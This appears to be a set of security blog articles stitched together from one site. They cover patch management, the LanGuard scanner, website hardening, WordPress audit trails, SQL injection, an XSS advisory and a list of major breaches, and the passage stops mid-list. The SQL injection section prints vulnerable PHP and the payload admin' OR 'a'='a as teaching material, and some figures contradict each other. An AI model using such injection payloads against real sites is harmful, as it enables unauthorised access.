This article continues with a number of important tips to further enhance the security of your company systems and how tools can be used to scan, identify, patch and automate the whole process of protecting your systems.

Tips To Enhance The System Security Patching Process (Continued)

Set Your Priorities

Not all computers in the organization need to be patched at the same time. Some computers are more likely to be attacked because they are interface facing. Systems handling e-commerce such as point-of-sales machines and servers holding the customer database are usually more vulnerable to attack. Therefore, prioritize the patching process so that the most critical systems are serviced before others are.

Standardize Your Configurations

If you use many tools and software programs, you will need to track and install several patches. Standardizing your configuration allows all systems to use the same operating system and tools. That results in easier maintenance and tracking of patches and service pack levels. If possible, lock down the configuration - this can easily be achieved in a Windows environment with the usage of Active Directory Group Policies. Enforcing Group Policies ensures users are not able to make any system configuration changes and all security polices are enforced correctly.

Plan Your Patches

Not all patches that the vendors release need to be installed. Actually, this depends on the criticality of the vulnerability that the patch fixes. If the patch fixes a critical vulnerability in a system that faces the maximum threat, install it immediately. For minor patches, the decision whether to install can be taken after an analysis of a what-if scenario in case the hole is left unpatched.

Using an automated multi-platform patching tool is highly recommended - it installs all the important patches after testing them.

Report Your Actions & Analyze

Once you have installed the patches, the post-patch work begins. It starts with a report of what was installed and how many vulnerable systems were fixed. Acceptance testing comes next, to determine if the patch installation was done the right way and there are no conflicts.

You must also test your system to see if the vulnerability has really been addressed. If the system still remains vulnerable, you may have to reinstall the patch or roll it back. A patch management tool makes the task simpler.

Test Your Systems Seriously

Testing a patch for effectiveness and conflicts is very important in maintaining a running business process. A patch that trashes a stable system because of conflicts can do a lot of harm. You can use third parties for testing the patches before you install them. However, even if successfully tested by others, it is advisable to test the patch in-house before installation, especially if system uptime is important to your business.

For in-house testing, virtualization helps as it provides a contained arena isolated from your actual production systems. In case of a virtualized environment a reliable backup tool is very important to ensure the prevention of data loss. You could also try out a controlled rollout on less critical systems to see how the patch functions before installing on the entire network.

Patch Your Systems Continually

Your IT team cannot rest if it has once patched the systems successfully. New vulnerabilities are discovered and the vendor releases further patches. Moreover, you may have deployed new tools. Therefore, the entire process of inventorying your assets, looking for patches and installing them is a continuous process along with conducting a vulnerability assessment of your network.

How An Automated Patch Management System Helps

In an organization, the IT team needs to manage and monitor all assets effectively, efficiently and with complete transparency. They must ensure that all assets of the company perform at their peak efficiency while remaining safeguarded from attacks on their vulnerabilities. When examining the internal security of a network, the IT team looks at the overall scenario for:

• Any unauthorized machine on the network
• Any machine that does not have the required security patches installed
• Any machine that does not have the necessary security set

An automated patch management system provides a consolidated platform for the IT team from where they can remotely manage the performance of the network and the software deployed while controlling the security of all the assets of the company.

Scanning Your Network Internally

LanGuard Network Security Scanner begins by scanning the entire network defined by a range of IP addresses. It is also possible to scan a list of computers or those under a specific domain. When scanned with null credentials, it generates a baseline scan giving you an idea of what any normal user would have access to. Apart from null credentials, you can set scanning credentials as a specific user or as the currently logged on user. Scanning with the full administrative access will provide complete details about any missing security patches and other vulnerabilities such as weak passwords used on shares.

While scanning, LanGuard Network Security Scanner displays its results in two panes. On the left are the nodes it has discovered and on the right is the real-time log of its activities. Each node on the left can be expanded to show the information LanGuard Network Security Scanner has gathered. The easy-to-read display shows the sorted results of SNMP queries, NetBIOS queries, ping sweeps and port scans, with which LanGuard has probed each IP in the range. If the number of IPs to be scanned is high, LanGuard indicates the progress in the lower-right corner of the screen.

Analyzing Your Results

After LanGuard has completed its scanning, you can analyze the results displayed. For a large list of IP addresses, the results are easier to read when you display them in a convenient report format. Choose from the several reporting options – you can also customize the report layout and content. You may also use the separate report generator tool.

The LanGuard report highlights all the known vulnerabilities and provides links to resources related to each problem. It lists all open ports and mentions problems with the service that the port provides. By default, LanGuard scans only a few ports notorious for their vulnerabilities. However, you can manually add more ports that you want LanGuard to scan.

Scanning Your Network Externally

You can also use LanGuard to access your network externally from a PC connected to the Internet. Select your public IP range and scan your network with null credentials. LanGuard will scan the ports of any IP addresses that do not respond to other queries and will expose any open ports that the firewalls and routers in the path have not blocked. You can set up different scanning configurations for LanGuard and save them for later recall.

Set Your Scanning Options

You need to adjust different settings when scanning LAN, WAN or MAN. The time to complete the scan depends on these settings. For example, with the Debug settings, you can control how much information LanGuard displays on its right pane; adjusting the settings in the SNMP section, you can control how LanGuard probes using SNMP.

There may be computers on the network that essentially block NetBIOS, ICMP and SNMP packets. LanGuard tackles such non-responsive machines by scanning their ports, provided you have enabled this option. However, this increases the scan time greatly.

Detect Missing Fixes & Security Patches

To keep itself current on the missing patches, LanGuard uses an XML file, which you can automatically download from Microsoft's Web Site. If you are using the registered version of LanGuard, you can deploy the missing patches remotely.

Document Your Activity

The registered version of LanGuard has a great tool for documenting your network. Configure it for a standard report output and list specific information about your network. Next time you scan, you can compare the reports to document the difference.

The report generator is a separate tool within LanGuard. You can use it to query the XML report files and create a custom report, which is a combination of multiple queries.

Summary

For any organization, the process of managing the inventory of assets, gathering information about vulnerabilities and then systematically patching them to protect from attacks, is a formidable task. Fortunately, automated tools for patch management make life easier for corporate IT teams. By automating much of the repetitive work, these tools allow IT to focus their expertise and knowledge where it benefits the company most – strengthening its cyber security.

Some security professionals would not be able to provide all the necessary steps and precautions to deter malicious users from abusing your web application. Many web developers will encounter some form of difficulty while attempting to secure their website, which is understandable since web application security is a multi-faceted concept, where an attacker could make use of thousands of different exploits that could be present on your website.

Although no single list of web security tips and tricks can be considered as complete (in fact, one of the tips is that the amount of knowledge, information and precautions that you can implement is never enough), the following is as close as you can get. We have listed six concepts or practices to aid you in securing your website which, as we already mentioned, is anything but straightforward. These points will get you started and nudge you in the right direction, where some factors in web application security are considered to be higher priority to be secured than others.

1. Hosting Options

Without web hosting services most websites would not exist. The most popular methods to host web applications are:regular hosting, where your web application is hosted on a dedicated server that is intended for your website only, and shared hosting, where you share a web server with other users who will in turn run their own web application on the same server.

There are multiple benefits to using shared hosting. Mainly this option is cheaper than having your own dedicated server which, therefore, generally attracts smaller companies preferring to share hosting space. The difference between shared and dedicated hosting will seem irrelevant when looking at this from a functionality point of view, since the website will still run, however, when discussing security we will need to look at it from a completely different perspective.

The downside of shared hosting trumps any advantages that it may offer. Since the web server is being shared between multiple web applications, any attacks will also be shared between them. For example, if you share your web server with an organisation that has been targeted by attackers who have launched Denial of Service attacks on its website, your web application will also be affected since it is being hosted on the same server while using resources from the same resource pool. Meanwhile, the absence of complete control over the web server itself will allow the provider to take certain decisions that may place your web application at risk of being exploited. If one of the websites being hosted on the shared server is vulnerable, there is a chance that all the other websites and the web server itself could be exploited. Read more about web server security.

2. Performing Code Reviews

Most successful attacks against web applications are due to insecure code and not the underlying platform itself. Case in point, SQL Injection attacks are still the most common type of attack even though the vulnerability itself has been around for over 20 years. This vulnerability does not occur due to incorrect input handling by the database system itself, it is entirely related to the fact that input sanitization is not implemented by the developer, which leads to untrusted input being processed without any filtering.

This approach only applies for injection attacks and, normally, inspecting code would not be this straightforward. If you are making use of a pre-built application, updating to the latest version would ensure that your web application does not contain insecure code, although if you are using custom built apps, an in depth code review by your development team will be required. Whichever application type you are using, securing your code is a critical step or else the very base of the web application will be flawed and therefore vulnerable.

3. Keeping Software Up To Date

When using software that has been developed by a third party, the best way to ensure that the code is secure would be to apply the latest updates. A simple web application will make use of numerous components that can lead to successful attacks if left unpatched. For example, both PHP and MySQL were vulnerable to exploits at a point in time but were later patched, and a default Linux webserver installation will include multiple services all of which need to be updated regularly to avoid vulnerable builds of software being exploited.

The importance of updating can be seen from the HEARTBLEED exploit discovered in OpenSSL, which is used by most web applications that serve their content via HTTPS. That being said, patching these vulnerabilities is an easy task once the appropriate patch has been released, you will simply need to update your software. This process will be different for every operating system or service although, just as an example to see how easy it is, updating services in Debian based servers will only require you to run a couple of commands.

4. Defending From Unauthorised Intrusions

While updating software will ensure that no known vulnerabilities are present on your system, there may still be entry points where an attacker can access your system that have been missed in our previous tips. This is where firewalls come into play. A firewall is necessary as it will limit traffic depending on your configuration and can also be found on most operating systems by default.

That being said, a firewall will only be able to analyse network traffic, which is why implementing a Web Application Firewall is a must if you are hosting a web application. WAFs are best suited to identifying malicious requests that are being sent to a web server. If the WAF identifies an SQL Injection payload in a request it will drop that request before it reaches the web server. Meanwhile if a WAF is not able to intercept these requests, you may also set up custom rules depending on the requests that need to be blocked. If you are wondering which requests you can block even before your WAF can, take a look at our next tip.

5. Performing Web Vulnerability Scans

No amount of code reviews and updates can ensure that the end product is not vulnerable and cannot be exploited. Code reviews are limited since the executed code is not being analysed, which is why web vulnerability scanning is essential. Web scanners will view the web application as a black box, where they will be analysing the finished product, which is not possible with white box scanning or code reviews. Meanwhile, some scanners will also provide you with the option to perform grey box scanning, by combining website scans and a backend agent that can analyse code.

As complex and large as web applications are nowadays, it would be easy to miss certain vulnerabilities while performing a manual penetration test. Web vulnerability scanners will automate this process for you, thereby being able to cover a larger website in less time, while being able to detect most known vulnerabilities. One notorious vulnerability that is difficult to identify is DOM-based XSS, although web scanners are still able to identify such vulnerabilities. Web vulnerability scanners will also provide you with requests that you need to block on your Web Application Firewall (WAF), while you are working to fix these vulnerabilities.

6. Importance Of Monitoring

It is imperative to know if your web application has been subjected to an attack. Monitoring the web application, and the server hosting it, would be the best way to ensure that even if an attacker gets past your defence systems, at least you will know how, when and from where it happened. There may be cases when a website is brought offline due to an attack and the owner would not even know about the incident but will find out after precious time has passed.

To avoid this you can monitor server logs, for example enabling notifications to be triggered when a file is deleted or modified. This way, if you had not modified that particular file, you will know that someone else has unauthorised access to your server. You can also monitor uptime which comes in handy when the attack is not as stealthy as modifying files, such as when your web server is subject to a Denial of Service attack. Such utilities will notify you as soon as your website is down, without having to discover the incident from users of your website.

The worst thing you can do when implementing monitoring services would be to base them on the same web server that is to be monitored. If this server was knocked down, the monitoring service will not be available to notify you.

7. Never Stop Learning

Finally, whatever you currently know about web security it’s never enough. Never stop learning about improving your web application’s security because literally every day brings a new exploit that may be used against your website. Zero day attacks happen out of the blue, which is why keeping yourself updated with any new security measures that you can implement is imperative. You can find such information from multiple web security blogs that detail how a website administrator should enforce their website’s security.

Monitoring

Users with different privileges can login to the website’s admin pages and publish content, install a plugin to add new functionality to the website, or change a WordPress theme to change the look and feel of the website. From the admin pages of WordPress users can do anything, including taking down the website for maintenance, depending on their privileges.

The Need to Keep a Log of What is Happening on Your WordPress

Every type of multi-user software keeps an audit trail that records all user activity on the system. And, since modern business websites have become fully blown multi-user web applications, keeping a WordPress audit trail is a critical and must do task. A default installation of WordPress does not have an audit trail, but the good news is that there are plugins such as WP Security Audit Log that allow you to keep an audit trial of everything that is happening on your WordPress.

Figure 1. Plugins like WP Security Audit Log provide detail tracking of all necessary events (click to enlarge)

There are several advantages to keeping track of all the changes that take place on your WordPress website in an audit trail. Here are just a few:

Keep Track Of Content & Functionality Changes On Your WordPress

By keeping a WordPress audit trail you can find out who did what on your WordPress website. For example; who published an article, or modified existing and already published content of an article or a page, installed a plugin, changed the theme or modified the source code of a file.

Figure 2. Searching for specific events in WordPress Security Audit Log (click to enlarge)

Be Alerted to Suspicious Activity on Your WordPress

By keeping a WordPress Audit trail you can also be alerted to suspicious activity on your WordPress at an early stage, thus thwarting possible hack attacks. For example, when a WordPress is hacked, typically the attackers reset a user’s password or create a new account to login to WordPress. By using an add-on such as Email Notifications you can create specific rules so when important changes happen on your WordPress they are logged and you are notified via email.

Figure 3. WP Security Audit Log: Creating customized email alerts for your WordPress site

Ensure the Productivity of Your Users & Employees

Nowadays many businesses employ remote workers. As much as businesses benefit by employing remote workers, there are disadvantages. For example, while the activity of employees who work from the office can be easily tracked, that of remote workers cannot. Therefore if your business website is powered by WordPress, when you install a WordPress audit trail plugin you can keep track of everything your web team is doing on the website, including the login and logout times, and location.

Ensure Your Business WordPress Websites Meet Mandatory Regulatory Compliance Requirements

If you have an online business, or if you are any sort of business via your WordPress website, there is a number of regulatory compliance requirements your website needs to adhere to, such as the PCI DSS. One common requirement these regulatory compliance requirements have is logs. As a website owner you should keep a log, or audit trail, of all the activity that is happening on your website.

Ease WordPress Troubleshooting

If you already have experience managing a multi-user system, you know that if something breaks down users will never tell you what they did. This is common, especially when administering customers’ websites. The customer has administrative access to WordPress. Someone installs a plugin, the website goes haywire yet it is no one’s fault. By keeping a WordPress audit trail you can refer to it and easily track any website changes that took place, thus making troubleshooting really easy.

Keep A WordPress Audit Trail

There are several other advantages when you keep a WordPress audit trail to keep a record of all the changes that take place on your WordPress site, such as having the ability to generate reports to justify your charges. The list of advantages can be endless but the most important one is security. Typically overlooked, logging also helps you ensure the long term security of your WordPress website.

SQL Injections

• 7 Security Tips to Protect Your Websites & Web Server From Hackers
• The Importance of Automating Web Application Security Testing & Penetration Testing
• The Implications of Unsecure Webservers & Websites for Organizations & Businesses
• WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker
• Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools

What Is A SQL Injection?

Websites operate typically with two sides to them: the frontend and backend.  The frontend is the element we see, the rendered HTML, images, and so forth.  On the backend however, there are layers upon layers of systems rendering the elements for the frontend. One such layer, the database, most commonly uses a database language called SQL, or Structured Query Language. This standardized language provides a logical, human-readable sentence to perform definition, manipulation, or control instructions on relational data in tabular form. The problem, however, is while this provides a structure for human readability, it also opens up a major problem for security.

How Does A SQL Injection Work?

So what does “disrupt the intended sentence of a SQL query” mean? A SQL query reads like an English sentence:

Take variable foo and set it to ‘bar’ in table foobar.
Notice the single-quotes around the intended value, bar. But if we take that value, add a single quote and some additional text, we can disrupt the intended sentence, creating two sentences that change the entire effect. So long as the database server can lexically understand the sentence, it is none the wiser and will happily complete its task.  So what would this look like?

If we take that value bar and change it to something more complex – bar’ in table foobar. Delete all values not equal to ‘ – it completely disrupts everything. The sentence is thus changed as follows:

Take variable foo and set it to ‘bar’ in table foobar. Delete all values not equal to ‘’ in table foobar.

Notice how dramatically this disrupts the intended sentence? By injecting additional information, including syntax, into the sentence, the entire intended function and result has been disrupted to effectively delete everything in the table, rather than just change a value.

What Does A SQL Injection Look Like?

In code form, a SQL injection can find itself in effectively any place a SQL query can be altered by the user of a web application. This means things like query strings e.g: example.com/?this=query_string, form content (such as a comments section on a blog or even a username & password input fields on a login page), cookie values, HTTP headers (e.g. X-FORWARDED-FOR), or practically anything else.  For this example, consider a simple query string in PHP:

Request URI: /?username=admin
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

First, we will break this down a bit.

On line #1, we set the value of the username field in the query string to the variable $user.

On line #2, we insert that variable’s value into the query string’s sentence. Substituting the variable for the value admin in the URI, the database query would ultimately be parsed as follows by MySQL:

UPDATE tbl_users SET admin=1 WHERE username='admin'

However, a lack of basic sanitization opens this query string up to serious consequences. All an attacker must do is put a single quote character in the username query string field in order to alter this sentence and inject whatever additional data he or she would like.

Here is an example of what this would look like:

Request URI: /?username=admin' OR 'a'='a
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

Now, with this altered data, here is what MySQL would see and attempt to evaluate:

UPDATE tbl_users SET admin=1 WHERE username='admin' OR 'a'='a'

Notice, now, that if the letter A equals the letter A (basically true=true), all users will be set to admin status.

Ensuring Code is Not Vulnerable to SQL Injection Vulnerabilities

If we were to add a function, mysql_real_escape_string() for example, on line #1, that would prevent this particular variable from being vulnerable to a SQL injection. In practice, it would look like this:

Request URI: /?username=admin' OR 'a'='a                                                                                                                                                            1.  $user = mysql_real_escape_string($_GET['username']);
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

This function escapes certain characters dangerous to MySQL queries, by prefixing those characters with backslashes. Rather than evaluate the single quote character literally, MySQL understands this prefixing backslash to mean do not evaluate the single quote. Instead, MySQL treats it as part of the whole value and keeps going.  The string, to MySQL, would therefore look like this:

UPDATE tbl_users SET admin=1 WHERE username='admin\' OR \'a\'=\'a'

Because each single quote is escaped, MySQL considers it part of the whole username value, rather than evaluating it as multiple components of the SQL syntax. The SQL injection is thus avoided, and the intention of the SQL sentence is thus undisrupted.

Caveat: For these examples, we used older, deprecated functions like mysql_query() and mysql_real_escape_string() for two reasons:

1.    Most PHP code still actively running on websites uses these deprecated functions;
2.    It allows us to provide simple examples easier for users to understand.

However, the right way to do it is to use prepared SQL statements. For example, the prepare() functions of the MySQLi and PDO_MySQL PHP extensions allow you to format and assemble a SQL statement using directive symbols very much like a sprintf() function does. This prevents any possibility of user input injecting additional SQL syntax into a database query, as all input provided during the execution phase of a prepared statement is sanitized.  Of course, this all assumes you are using PHP, but the idea still applies to any other web language.

SQL Injection Is The Most Widely Exploited Vulnerability

Even though it has been more than sixteen years since the first documented attack of SQL Injection, it is still a very popular vulnerability with attackers and is widely exploited. In fact SQL Injection has always topped the OWASP Top 10 list of most exploited vulnerabilities.

During the 30 minutes interview, Security Weekly’s host Paul Asadoorian and Ferruh Mavituna highlight how important it is to use an automated web application security scanner to find vulnerabilities in websites and web applications. They also briefly discuss web application firewalls and their effectiveness, and how Netsparker is helping organizations improve their post scan process of fixing vulnerabilities with their online web application security scanner Netsparker Cloud.

Paul and Ferruh covered several other aspects of web application security during this interview, so if you are a seasoned security professional, a developer or a newbie it is a recommended watch.  

To view the interview, click on the image below:

Figure 1. Netsparker CEO explains the importance of automated web application security scanners

8th of May 2015

The Genericons icon font package, which is used in a number of popular themes and plugins, contained an HTML file vulnerable to a cross-site scripting attack. All affected themes and plugins hosted on WordPress.org (including the Twenty Fifteen default theme) have been updated yesterday by the WordPress security team to address this issue by removing this nonessential file. To help protect other Genericons usage, WordPress 4.2.2 proactively scans the wp-content directory for this HTML file and removes it. Reported by Robert Abela of Netsparker.

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in Netsparker's article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application.

Related Security Articles

• The Implications of Unsecure Webservers & Websites for Organizations & Businesses
• The Importance of Automating Web Application Security Testing & Penetration Testing
• Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools

Various concepts and security practices – such as using complex passphrases, or eschewing passphrases entirely, deeply vetting email sources, safe surfing habits, etc. – are increasingly growing trends among the general workforce at large, especially with the ubiquity of computers at every desk.  But security in general is still unfortunately looked at as an afterthought, even when a lack thereof begets massive financial loss at a seemingly almost daily level.

Security engineers are all too often considered an unnecessary asset, simply a menial role anybody can do; A role that can be assumed as yet another hat worn by developers, system administrators, or, well, perhaps just someone who only shows a modest capability with Excel formulas.  Whatever the reason for such a decision, be it financial or otherwise, the consequences can be severe and long-lasting.  Sony underestimated the value of a strong and well-equipped security team multiple times, choosing to forego a powerful army in lieu of a smaller, less outfitted and, thus, thinner stretched but cheaper alternative.  This, in turn, yielded among the largest multiple security breaches to ever be seen, especially by a single corporation.  Were their security department better outfitted with the right tools, it is quite possible those events would have played out entirely different.

Using The Right Security Tools

So, what constitutes “the right tools”?  Many things.  A well-populated team of capable security engineers certainly can be considered a valuable tool in building a strong security posture within an infrastructure.  But, more specifically and very critically, it is what assets those engineers have at their disposal that may mean the difference between a minor event that never even makes it outside the corporate headquarters doors, and a major event that results in a corporation paying for identity theft protection for millions of customers.  Those tools of course vary widely depending on the organization, but one common element they all do – or at least absolutely should – share is a web application security scanner.

What Is A Web Application Security Scanner?

A website that accepts user input in any form, be it URL values or submitted content, is a complex beast.  Not only does the content an end user provides change the dynamics of the website, but it even has the potential to cripple that website if done maliciously and left unprotected against.  For every possibility of user content, the amount of potential attack vectors increases on a magnitude of near infinity.  It is literally impossible for a security engineer, or even team thereof, to account for all these possibilities by hand and, especially, test them for known or unknown vulnerabilities.

Web scanners exist for this very purpose, designed carefully to predict potential and common methods of attack, then brute-force test them to find any possibility of an existing vulnerability.  And they do this at a speed impossible for humans to replicate manually.  This is crucial for many reasons, namely that it saves time, it is thorough and comprehensive, and, if designed well, adaptive and predictive to attempt clever methods that even the most skilled security engineer may not immediately think of.  Truly, not using a web security scanner is only inviting potentially irreparable harm to a web application and even the company behind it.  But the question remains: Which web scanner works the best?

Options Galore - How To Choose Which Web Scanner Is Right For You

Many websites and web applications are like a human fingerprints, with no two being alike.  Of course, many websites may use a common backend engine – Wordpress, an MVC framework like Laravel or Ruby on Rails, etc. – but the layers on top of those engines, such as plugins or custom coded additions, are often a quite unique collection. 

The backend engine is also not the only portion to be concerned with.  Frontend vulnerabilities may exist with each of these layers, such as cross-site scripting, insecurely implemented jQuery libraries, and add-ons, poor sanitization against AJAX communication models, and many more.  Each layer presents another nearly endless array of input possibilities to test for vulnerabilities.

A web scanner needs to be capable of digging through these unique complexities and provide accurate, reliable findings.  False positives can waste an engineer’s time, or worse, send a development team on a useless chase to perform unit tests, wasted looking for a falsely detected vulnerability.  And if the scanner is difficult to understand or provides little understanding of the detected vulnerabilities, it makes for a challenging or undesirable utility that may go unused.  Indeed, a well-designed web security scanner that delivers on all fronts is an important necessity for a strong security posture and a better secured infrastructure.

Final Thoughts

There is no one perfect solution that will solve all problems and completely secure your website such that it becomes impenetrable.  Further, a web security scanner will only be as effective as the security engineers or developers fixing all flaws it finds.  A web security scanner is only the first of many, many steps, but it indeed is an absolutely critical one for a powerful security posture.

Indeed, we keep returning to that phrase – security posture – because it is a perfectly analogous way to look at web application, system, and infrastructure security for both what it provides and what is required for good posture: a strong backbone.  Focused visibility and a clear view of paths over obstructions is not possible with a slouched posture.  Nothing will provide that vision as clearly as a web security scanner will, and no backbone is complete without a competent and useful web security scanning solution at its top.

Many Windows desktop software applications have moved to the “cloud”. Though, even though the whole industry wants you and your data in the cloud, have you ever looked into the pros and cons of the cloud? Does it make sense to go into that direction?

Let’s use web application security scanners as an example, software that is used to automatically identify vulnerabilities and security flaws in websites and web applications. Most, if not all of the industry leading vendors have both a desktop edition and an online service offering. In fact Netsparker just launched their all new service offering; Netsparker Cloud, the online false positive free web application security scanner. In such case which one should you go for?

As clearly explained in Netsparker Desktop VS Netsparker Cloud both web security solutions are built around the same scanning engine, hence their vulnerability detection capabilities are the same. The main differences between both of them are the other non-scan related features, which also define the scope of the solution.

Figure 1. Netsparker Cloud-based Security Sanner (Click to enlarge)

For example Netsparker Desktop is ideal for small teams, or security professionals who work on their own and have a small to medium workload. On the other hand Netsparker Cloud is specifically designed for organizations which run and manage a good number of websites and maybe even have their own team of developers and security professionals. It is a multi–user platform, has a vulnerability tracking solution (a system that is similar to a normal bug tracking solution but specifically designed for web application vulnerabilities) and it is fully scalable, to accommodate the simultaneous scanning of hundreds and thousands of web applications.

Figure 2. Netsparker Desktop-based Security Sanner (Click to enlarge)

Do not just follow the trend, inform yourself. Yes, your readings might be flooding with cloud related terms, the industry is pushing you to move your operations to the cloud as it is cheaper and more reliable, but as clearly explained in the desktop vs cloud web scanner comparison, both solutions still have a place in today’s industry.

Web application security is different than network security. When configuring a firewall you control who accesses what, but when it comes to web application security you have to allow everybody in, including the bad guys and expect that everyone plays by the rules. Hence web applications should be secure; web application security should be given much more attention and considering the complexity of today’s web applications, it should be automated.

Let’s dig in deep in this subject and see why it needs to be automated.

Automated Web Security Testing Saves Time

Also known as Penetration Testing or “pen testing”, this is the process by which a security engineer or “pen tester” applies a series of injection or vulnerability tests against areas of a website that accept user input to find potential exploits and alert the website owner before they get taken advantage of and become massive headaches or even financial losses. Common places for this can include user data submission areas such as authentication forms, comments sections, user viewing configuration options (like layout selections), and anywhere else that accepts input from the user. This can also include the URL itself, which may have a Search Engine Optimization-friendly URI formatting system.

Most MVC frameworks or web application suites like WordPress offer this type of URI routing. (We differentiate a URL and URI. A URL is the entire address, including the http:// portion, the entire domain, and everything thereafter; whereas the URI is the portion starting usually after the domain (but sometimes including, for context), such as /user/view/123 or test.com/articles/123.)

For example, your framework may take a URI style as test.com/system/function/data1/data2/, where system is the controlling system you wish to invoke (such as an articles system), function is the action you wish to invoke (such as read or edit), and the rest are data values, typically in assumed positions (such as year/month/article-title).

Each of these individual values require a specific data type, such as a string, an integer, a certain regular expression match, or infinite other possibilities. If data types are not strictly enforced, or – sadly as often as this really does happen – user-submitted data is properly sanitized, then a hacker can potentially gain information to get further access, if not even force direct backdoor access via a  SQL injection or a remote file inclusion. Such vulnerabilities are such a prevalent and consistent threat, that for example SQL Injection has made it to the OWASP Top 10 list for over 14 years.

There exist potentially millions, billions, or more combinations of various URIs in your web application, including ones it may not support by default or even to your knowledge. There could be randomphpinfo(); scripts publicly accessible that mistakenly got left in by a developer, an unchecked user input somewhere, some file upload system that does not properly prevent script execution – any random number of possibilities. No security engineer or his team can reasonably assume for or test all of these possibilities. And black-hat hackers know all this too, sometimes better than those tasked to protect against these threats.

Automation Isn’t Just Used By The Good Guys

Many automated security tools exist not to test and find security holes, but to exploit them when found. Black-hat hackers intent on disrupting your web application possess automated suites as well, because they too, know a manual approach is a waste of time (that is, until they find a useful exploit, and by then it’s sometimes too late).

Some utilities, like Slowloris, exist to exploit known weaknesses in common web services, like the Apache web server itself. Others pray on finding opportunity in the form of insecure common web applications – older versions of Wordpress, phpBB, phpMyAdmin, cPanel, or other frequently exploited web applications. There exist dozens of categorical vulnerabilities, each with thousands or millions of various attack variants. Looking for these is a daunting task.

As quickly as you can spin up a web application, a hacker can automatically scan it and possibly find vulnerabilities. Leveraging an automated web application vulnerability scanner like Netsparker or Netsparker Cloud provides you the agility and proactivity to find and prevent threats before they become seriously damaging problems. This holds especially true for complex web applications such as large forum systems, blogging platforms and custom web applications. The more possibility for user submitted data and functionality, the more opportunity for vulnerabilities to exist and be exploited. And remember, this changes again for every new version of the web application you install. A daunting task, indeed.

Without automation of web application security testing, a true strong security posture is impossible to achieve. Of course, many other layers ultimately exist – least-privilege practice, segregated (jail, chroot, virtual machine) systems, firewalls, etc. – but if the front door is not secure, what does it matter if the walls are impenetrable? With the speed afforded by automation, a strong and capable web vulnerability scanner, and of course patching found flaws and risks, security testing guarantees as best as reasonably possible that the front door to your web application and underlying infrastructure remains reinforced and secure.

Netsparker

Netsparker need to ensure that their scanners are able to crawl and identify attack surfaces on all sort of web applications, and identify as much vulnerabilities as possible. Hence they frequently scan open source web applications. They use open source web applications as a test bed for their crawling and scanning engine.

Thanks to such exercise Netsparker are also helping developers ship more secure code, since they report their findings to the developers and sometimes also help them remediate the issue. When such web application vulnerabilities are identified Netsparker release an advisory and between 2011 and 2014 Netsparker published 87 advisories.

A few days ago Netsparker released some statistics about the 87 advisories they published so far. As a quick overview, from these statistics we can see that cross-site scripting is the most common vulnerability in the open source web applications that were scanned. Is it a coincidence? Not really.

The article also explains why most probably many web applications are vulnerable to this vulnerability, which made it to the OWASP Top 10 list ever since.

The conclusion we can draw up from such statistics is quite predictable, but at the same time shocking. There is still a very long way to go in web application security, i.e. web applications are still poorly coded, making them an easy target for malicious hacker attacks.

Unfortunately companies and webmasters turn their attention to their webservers and websites, after the damage is done, in which case the cost is always greater than any proactive measures that could have been taken to avoid the situation.

Most Security Breaches Could Have Been Easily Prevented

Without doubt, corporate websites and webservers are amongst the highest preference for hackers. Exploiting well-known vulnerabilities provides them with easy-access to databases that contain sensitive information such as usernames, passwords, email addresses, credit & debit card numbers, social security numbers and much more.

The sad part of this story is that in most cases, hackers made use of old exploits and vulnerabilities to scan their targets and eventually gain unauthorized access to their systems.

Most security experts agree that if companies proactively scanned and tested their systems using well-known web application security scanner tools e.g Netsparker, the security breach could have been easily avoided. The Online Trust Alliance (OTA) comes to also confirm this as they analyzed thousands of security breaches that occurred in the first half of 2014 and concluded that these could have been easily prevented. [Source: OTA Website]

Tools such as Web Application Vulnerability Scanners are used by security professionals to automatically scan websites and web applications for hidden vulnerabilities.

When reading through recent security breaches, we can slowly begin to understand the implications and disastrous effects these had for companies and customers. Quite often, the figure of affected users who’s information was compromised, was in the millions. We should also keep in mind that in many cases, the true magnitude of any such security incident is very rarely made known to the public.

Below are a few of the biggest security data breaches which exposed an unbelievable amount of information to hackers:

 eBay.com – 145 Million Compromised Accounts

In late February – early March 2014, the eBay database that held customer names, encrypted passwords, email addresses, physical addresses, phone numbers, dates of birth and other personal information, was compromised, exposing sensitive information to hackers. [Source:  bgr.com website]

JPMorgan Chase Bank – 76 Million Household Accounts & 7 Million Small Business

In June 2014, JPMorgan Chase bank was hit badly and had sensitive personal and financial data exposed for over 80 million accounts. The hackers appeared to obtain a list of the applications and programs that run on the company’s computers and then crosschecked them with known vulnerabilities for each program and web application in order to find an entry point back into the bank’s systems.
[Source: nytimes.com website]

Find security holes on your websites and fix them before they do by scanning your websites and web applications with a Web Application Security Scanner.

Forbes.com – 1 Million User Accounts

In February 2014, the Forbes.com website was succumbed to an attack that leaked over 1 million user accounts that contained email addresses, passwords and more.  The Forbes.com Wordpress-based backend site was defaced with a number of news posts. [Source: cnet.com website]

Snapchat.com – 4.6 Million Username Accounts & Phone numbers

In January 2014, Snapchat’s popular website had over 4.6 million usernames and phone numbers exposed due to a brute force enumeration attack against their Snapchat API. The information was publicly posted on several other sites, creating a major security concern for Snapchat and its users.
[Source: cnbc.com website]

USA Businesses: Nasdaq, 7-Eleven and others – 160 Million Credit & Debit Cards

In 2013 a massive underground attack was uncovered, revealing that over 160 million credit and debit cards were stolen during the past seven years. Five Russians and Ukrainians used advanced hacking techniques to steal the information during these years.  Attackers targeted over 800,000 bank accounts and penetrated servers used by the Nasdaq stock exchange.
[Source: nydailynews.com website]

AT&T - 114,000 iPad Owners (Includes White House Officers, US Senate & Military Officials)

In 2010, a major security breach on AT&T’s website compromised over 114,000 customer accounts, revealing names, email addresses and other information. AT&T acknowledged the attack on its webservers and commented that the risk was limited to the subscriber’s email address.  
Amongst the list were apparently officers from the White House, member of the US Senate, staff from NASA, New York Times, Viacom, Time Warner, bankers and many more. [Source: theguardian.com website]

Target  - 98 Million Credit & Debit Cards Stolen

